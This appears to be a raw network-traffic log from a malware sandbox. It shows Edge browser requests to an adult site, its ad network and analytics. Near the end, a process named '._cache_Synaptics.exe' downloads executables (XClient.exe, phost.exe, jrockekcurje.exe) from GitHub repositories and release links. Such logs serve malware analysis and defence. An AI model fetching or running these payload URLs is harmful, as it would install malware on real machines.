IN CNAME

ss.phncdn.com.sds.rncdn7.com

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.17

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.20

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.18

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.21

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.19

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.22

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.16

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.23
DNS

a.adtng.com

msedge.exe

Remote address:

8.8.8.8:53

Request

a.adtng.com

IN A

Response

a.adtng.com

IN A

66.254.114.171
DNS

region1.google-analytics.com

msedge.exe

Remote address:

8.8.8.8:53

Request

region1.google-analytics.com

IN A

Response

region1.google-analytics.com

IN A

216.239.34.36

region1.google-analytics.com

IN A

216.239.32.36
GET

https://a.adtng.com/get/10000098?&uuid=bf4367ea3fa14522a6a01981a2d48b0c&impid=bf4367ea3fa14522a6a01981a2d48b0c-1&tj_zid=5&tj_cid=1007935961&tj_aid=2071998101&infos=CiQwYWY2ZWY2NC1lNTBhLTQ1NjgtYmFiZi00ODU2ZWM4MzgyZDAQkc/3vAYaImJmNDM2N2VhM2ZhMTQ1MjJhNmEwMTk4MWEyZDQ4YjBjLTEgAjAFOAVAtZEXSNnDz+ADUgEyWNXrqd4DYIe7tYMEciAzNThkNTRlMjU5OTk0YTBjOWE3MWRjMjE2MjJlOGNjOYEB8WjjiLX45D6SAQJHQpoBA0VOR6IBBkxvbmRvbsoBFWNvZ2VudCBjb21tdW5pY2F0aW9uc9IBBHdpZmnaAQd3aW5kb3dz4gEOMTgxLjIxNS4xNzYuODP6AQ4xODEuMjE1LjE3Ni44M4ICB2RlZDc2NTSSAgRlZGdlmgIERUMxTqoCBDEwLjCyAgQ5Mi4w2AKV3YDcB+AC6dCynwT6AgExggNfeyJhY3Rvcl9pZCI6bnVsbCwiY29udGVudF90eXBlIjpudWxsLCJ2aWRlb19pZCI6bnVsbCwiaGFzaCI6ImJiMGNjMGJiNTQ5ODZkODJmMWM1NzgzYThiNDc5MDc5In2SAwdkZXNrdG9wmgMCZW6oAwHCAwRob21lmAQB2AQj&noc=1

msedge.exe

Remote address:

66.254.114.171:443

Request

GET /get/10000098?&uuid=bf4367ea3fa14522a6a01981a2d48b0c&impid=bf4367ea3fa14522a6a01981a2d48b0c-1&tj_zid=5&tj_cid=1007935961&tj_aid=2071998101&infos=CiQwYWY2ZWY2NC1lNTBhLTQ1NjgtYmFiZi00ODU2ZWM4MzgyZDAQkc/3vAYaImJmNDM2N2VhM2ZhMTQ1MjJhNmEwMTk4MWEyZDQ4YjBjLTEgAjAFOAVAtZEXSNnDz+ADUgEyWNXrqd4DYIe7tYMEciAzNThkNTRlMjU5OTk0YTBjOWE3MWRjMjE2MjJlOGNjOYEB8WjjiLX45D6SAQJHQpoBA0VOR6IBBkxvbmRvbsoBFWNvZ2VudCBjb21tdW5pY2F0aW9uc9IBBHdpZmnaAQd3aW5kb3dz4gEOMTgxLjIxNS4xNzYuODP6AQ4xODEuMjE1LjE3Ni44M4ICB2RlZDc2NTSSAgRlZGdlmgIERUMxTqoCBDEwLjCyAgQ5Mi4w2AKV3YDcB+AC6dCynwT6AgExggNfeyJhY3Rvcl9pZCI6bnVsbCwiY29udGVudF90eXBlIjpudWxsLCJ2aWRlb19pZCI6bnVsbCwiaGFzaCI6ImJiMGNjMGJiNTQ5ODZkODJmMWM1NzgzYThiNDc5MDc5In2SAwdkZXNrdG9wmgMCZW6oAwHCAwRob21lmAQB2AQj&noc=1 HTTP/2.0
host: a.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: openresty
date: Sat, 01 Feb 2025 09:21:23 GMT
content-type: text/html
access-control-allow-credentials: true
access-control-allow-methods: GET
access-control-allow-headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Requested-With
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
POST

https://region1.google-analytics.com/g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je51u0v889308053z8892446692za200zb892446692&_p=1738401681297&gcs=G100&gcd=13p3p3l3l5l1&npa=0&dma=0&tag_exp=102067808~102081485~102123608~102482432~102528644~102539968~102546754&cid=1380070532.1738401682&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=denied&_s=1&sid=1738401682&sct=1&seg=0&dl=https%3A%2F%2Fwww.pornhub.com%2F&dt=Free%20Porn%20Videos%20%26%20Sex%20Movies%20-%20Porno%2C%20XXX%2C%20Porn%20Tube%20%7C%20Pornhub&en=page_view&_fv=1&_nsi=1&_ss=1&ep.login_user=No&ep.user_interface=pc&ep.content_group=homepage&ep.content_group_2=homepage&ep.shorties_orientation=straight&ep.referrer_group=external&ep.seo_tags_translation=0&ep.watch_page_exp_value=B&ep.dd_homepage_restructure=ineligible&up.login_user=No&up.user_interface=pc&up.signup_experiment_value=all&up.orientation=straight&up.shorties_experiment_version=phase_1&up.shorties_exp_2=B&up.shorties_orientation=straight&up.isp=Cogent%20Communications&up.connection_type=Corporate&up.seo_tags_translation_user=0&tfd=1812

msedge.exe

Remote address:

216.239.34.36:443

Request

POST /g/collect?v=2&tid=G-B39RFFWGYY&gtm=45je51u0v889308053z8892446692za200zb892446692&_p=1738401681297&gcs=G100&gcd=13p3p3l3l5l1&npa=0&dma=0&tag_exp=102067808~102081485~102123608~102482432~102528644~102539968~102546754&cid=1380070532.1738401682&ul=en-us&sr=1280x720&uaa=x86&uamb=0&uam=&uap=Windows&uapv=10.0&uaw=0&frm=0&pscdl=denied&_s=1&sid=1738401682&sct=1&seg=0&dl=https%3A%2F%2Fwww.pornhub.com%2F&dt=Free%20Porn%20Videos%20%26%20Sex%20Movies%20-%20Porno%2C%20XXX%2C%20Porn%20Tube%20%7C%20Pornhub&en=page_view&_fv=1&_nsi=1&_ss=1&ep.login_user=No&ep.user_interface=pc&ep.content_group=homepage&ep.content_group_2=homepage&ep.shorties_orientation=straight&ep.referrer_group=external&ep.seo_tags_translation=0&ep.watch_page_exp_value=B&ep.dd_homepage_restructure=ineligible&up.login_user=No&up.user_interface=pc&up.signup_experiment_value=all&up.orientation=straight&up.shorties_experiment_version=phase_1&up.shorties_exp_2=B&up.shorties_orientation=straight&up.isp=Cogent%20Communications&up.connection_type=Corporate&up.seo_tags_translation_user=0&tfd=1812 HTTP/2.0
host: region1.google-analytics.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

pix-ht.trafficjunky.net

msedge.exe

Remote address:

8.8.8.8:53

Request

pix-ht.trafficjunky.net

IN A

Response

pix-ht.trafficjunky.net

IN CNAME

pix-ht.trafficjunky.net.sds.rncdn7.com

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.23

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.22

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.17

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.16

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.18

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.19

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.21

pix-ht.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.20
DNS

ht-cdn2.adtng.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ht-cdn2.adtng.com

IN A

Response

ht-cdn2.adtng.com

IN CNAME

ht-cdn2.adtng.com.sds.rncdn7.com

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.17

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.22

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.21

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.23

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.16

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.19

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.20

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.18
GET

https://ht-cdn2.adtng.com/delivery/vortex/vortex-simple-1.0.0.js

msedge.exe

Remote address:

64.210.156.17:443

Request

GET /delivery/vortex/vortex-simple-1.0.0.js HTTP/2.0
host: ht-cdn2.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://a.adtng.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:23 GMT
content-type: application/javascript
content-length: 5027
last-modified: Fri, 02 Nov 2018 14:17:11 GMT
etag: "13a3-579af30f7688b"
expires: Fri, 20 Dec 2024 11:03:13 GMT
cache-control: max-age=10703024
vary: Accept-Encoding
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
accept-ranges: bytes
x-cdn-diag: lon1-16009-2-3223509-h-0-0---;16007-93-3534234----0-0-1
GET

https://ht-cdn2.adtng.com/a7/creatives/221/1559/819920/1112280/1112280_logo.png

msedge.exe

Remote address:

64.210.156.17:443

Request

GET /a7/creatives/221/1559/819920/1112280/1112280_logo.png HTTP/2.0
host: ht-cdn2.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://a.adtng.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:23 GMT
content-type: image/png
content-length: 16477
last-modified: Thu, 01 Aug 2024 14:43:31 GMT
etag: "405d-61ea03c07aac0"
expires: Mon, 02 Dec 2024 02:01:40 GMT
cache-control: max-age=10472251
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
accept-ranges: bytes
x-cdn-diag: lon1-16007-3-3264621-h-0-0---;16007-93-3534234----0-0-0
GET

https://ht-cdn2.adtng.com/a7/creatives/221/1559/819920/1112280/1112280_video.mp4

msedge.exe

Remote address:

64.210.156.17:443

Request

GET /a7/creatives/221/1559/819920/1112280/1112280_video.mp4 HTTP/2.0
host: ht-cdn2.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://a.adtng.com/
accept-language: en-US,en;q=0.9
range: bytes=0-

Response

HTTP/2.0 206

date: Sat, 01 Feb 2025 09:21:23 GMT
content-type: video/mp4
content-length: 811882
last-modified: Thu, 01 Aug 2024 14:50:17 GMT
etag: "c636a-61ea0543abc40"
expires: Sat, 25 Jan 2025 16:32:39 GMT
cache-control: max-age=10525155
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
content-range: bytes 0-811881/811882
x-cdn-diag: lon1-16007-1-3264525-h-0-0---;16007-42-3534234----0-0-0
DNS

171.114.254.66.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.114.254.66.in-addr.arpa

IN PTR

Response

171.114.254.66.in-addr.arpa

IN PTR

reflectededge reflectednet
DNS

hw-cdn2.adtng.com

msedge.exe

Remote address:

8.8.8.8:53

Request

hw-cdn2.adtng.com

IN A

Response

hw-cdn2.adtng.com

IN CNAME

t.sni.global.fastly.net

t.sni.global.fastly.net

IN A

151.101.195.52

t.sni.global.fastly.net

IN A

151.101.131.52

t.sni.global.fastly.net

IN A

151.101.3.52

t.sni.global.fastly.net

IN A

151.101.67.52
GET

https://hw-cdn2.adtng.com/delivery/intersection_observer/IntersectionObserver.js

msedge.exe

Remote address:

151.101.195.52:443

Request

GET /delivery/intersection_observer/IntersectionObserver.js HTTP/2.0
host: hw-cdn2.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://a.adtng.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: openresty/1.19.9.1
content-type: application/javascript
last-modified: Tue, 05 Apr 2022 20:54:54 GMT
etag: "41f5-5dbee74f4a3c8"
expires: Fri, 25 Apr 2025 21:03:14 GMT
cache-control: max-age=10646761, stale-while-revalidate=86400, stale-if-error=86400
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Sat, 01 Feb 2025 09:21:23 GMT
age: 3433450
x-served-by: cache-ams21065-AMS, cache-lcy-eglc8600041-LCY
x-cache: HIT, HIT
x-cache-hits: 15, 325468
x-timer: S1738401684.930523,VS0,VE0
access-control-allow-origin: *
content-length: 16885
DNS

storage.googleapis.com

msedge.exe

Remote address:

8.8.8.8:53

Request

storage.googleapis.com

IN A

Response

storage.googleapis.com

IN A

216.58.213.27

storage.googleapis.com

IN A

216.58.201.123

storage.googleapis.com

IN A

142.250.187.219

storage.googleapis.com

IN A

172.217.16.251

storage.googleapis.com

IN A

172.217.169.27

storage.googleapis.com

IN A

216.58.204.91

storage.googleapis.com

IN A

172.217.169.59

storage.googleapis.com

IN A

142.250.178.27

storage.googleapis.com

IN A

216.58.212.219

storage.googleapis.com

IN A

142.250.187.251

storage.googleapis.com

IN A

142.250.179.251

storage.googleapis.com

IN A

142.250.200.27

storage.googleapis.com

IN A

142.250.180.27

storage.googleapis.com

IN A

142.250.200.59
GET

https://storage.googleapis.com/workbox-cdn/releases/5.1.3/workbox-sw.js

msedge.exe

Remote address:

216.58.213.27:443

Request

GET /workbox-cdn/releases/5.1.3/workbox-sw.js HTTP/2.0
host: storage.googleapis.com
cache-control: max-age=0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

36.34.239.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

36.34.239.216.in-addr.arpa

IN PTR

Response
DNS

17.156.210.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.156.210.64.in-addr.arpa

IN PTR

Response
DNS

52.195.101.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

52.195.101.151.in-addr.arpa

IN PTR

Response
DNS

27.213.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

27.213.58.216.in-addr.arpa

IN PTR

Response

27.213.58.216.in-addr.arpa

IN PTR

lhr25s25-in-f271e100net

27.213.58.216.in-addr.arpa

IN PTR

ber01s14-in-f27�H
DNS

26.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.173.189.20.in-addr.arpa

IN PTR

Response
GET

http://github.com/Abdulah345/pizdaporc/raw/refs/heads/main/XClient.exe

._cache_Synaptics.exe

Remote address:

20.26.156.215:80

Request

GET /Abdulah345/pizdaporc/raw/refs/heads/main/XClient.exe HTTP/1.1
Host: github.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Content-Length: 0
Location: https://github.com/Abdulah345/pizdaporc/raw/refs/heads/main/XClient.exe
GET

https://github.com/Abdulah345/pizdaporc/raw/refs/heads/main/XClient.exe

._cache_Synaptics.exe

Remote address:

20.26.156.215:443

Request

GET /Abdulah345/pizdaporc/raw/refs/heads/main/XClient.exe HTTP/1.1
Host: github.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 01 Feb 2025 09:21:38 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/Abdulah345/pizdaporc/refs/heads/main/XClient.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: EB6E:1BF679:9D967F:C81D2C:679DE7A2
GET

https://github.com/homboz/ph1/releases/download/po1/phost.exe

._cache_Synaptics.exe

Remote address:

20.26.156.215:443

Request

GET /homboz/ph1/releases/download/po1/phost.exe HTTP/1.1
Host: github.com

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 01 Feb 2025 09:21:39 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/900477894/166efba7-6d8f-45e7-9bad-9047bb8b57b9?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250201T092139Z&X-Amz-Expires=300&X-Amz-Signature=2d083d77c8e010aa7e93c8e673be0bd85b7d1bab8cdb64173c5158fa62577720&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dphost.exe&response-content-type=application%2Foctet-stream
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: EB6E:1BF679:9D96B3:C81D81:679DE7A2
GET

https://raw.githubusercontent.com/Abdulah345/pizdaporc/refs/heads/main/XClient.exe

._cache_Synaptics.exe

Remote address:

185.199.109.133:443

Request

GET /Abdulah345/pizdaporc/refs/heads/main/XClient.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 39936
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "9739109dfc1a65fcc00300514b0ba99b08af78493f7c4a15b58833812089f954"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 6A5F:14DA0C:168AE8:1F786E:679DE7A2
Accept-Ranges: bytes
Date: Sat, 01 Feb 2025 09:21:39 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600059-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1738401699.025661,VS0,VE332
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 870ea9f8fea26f40f424d5d001e7fc1bdad62522
Expires: Sat, 01 Feb 2025 09:26:39 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/yuriksq/papilla/refs/heads/main/jrockekcurje.exe

._cache_Synaptics.exe

Remote address:

185.199.109.133:443

Request

GET /yuriksq/papilla/refs/heads/main/jrockekcurje.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 295424
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "81700dd544f61401abdaeb3499bfcec47f048489c577ff7c4109b967bc27d89b"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 886A:18013F:1D4947:299D7F:679DE7C3
Accept-Ranges: bytes
Date: Sat, 01 Feb 2025 09:22:24 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600059-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1738401744.008835,VS0,VE330
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 396d896741e65cae76bf4b23aba1e880403dfa29
Expires: Sat, 01 Feb 2025 09:27:24 GMT
Source-Age: 0
DNS

objects.githubusercontent.com

._cache_Synaptics.exe

Remote address:

8.8.8.8:53

Request

objects.githubusercontent.com

IN A

Response

objects.githubusercontent.com

IN A

185.199.108.133

objects.githubusercontent.com

IN A

185.199.109.133

objects.githubusercontent.com

IN A

185.199.111.133

objects.githubusercontent.com

IN A

185.199.110.133
GET

https://objects.githubusercontent.com/github-production-release-asset-2e65be/900477894/166efba7-6d8f-45e7-9bad-9047bb8b57b9?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250201%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250201T092139Z&X-Amz-Expires=300&X-Amz-Signature=2d083d77c8e010aa7e93c8e673be0bd85b7d1bab8cdb64173c5158fa62577720&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dphost.exe&response-content-type=application%2Foctet-stream

._cache_Synaptics.exe

Remote address:

185.199.108.133:443

Request

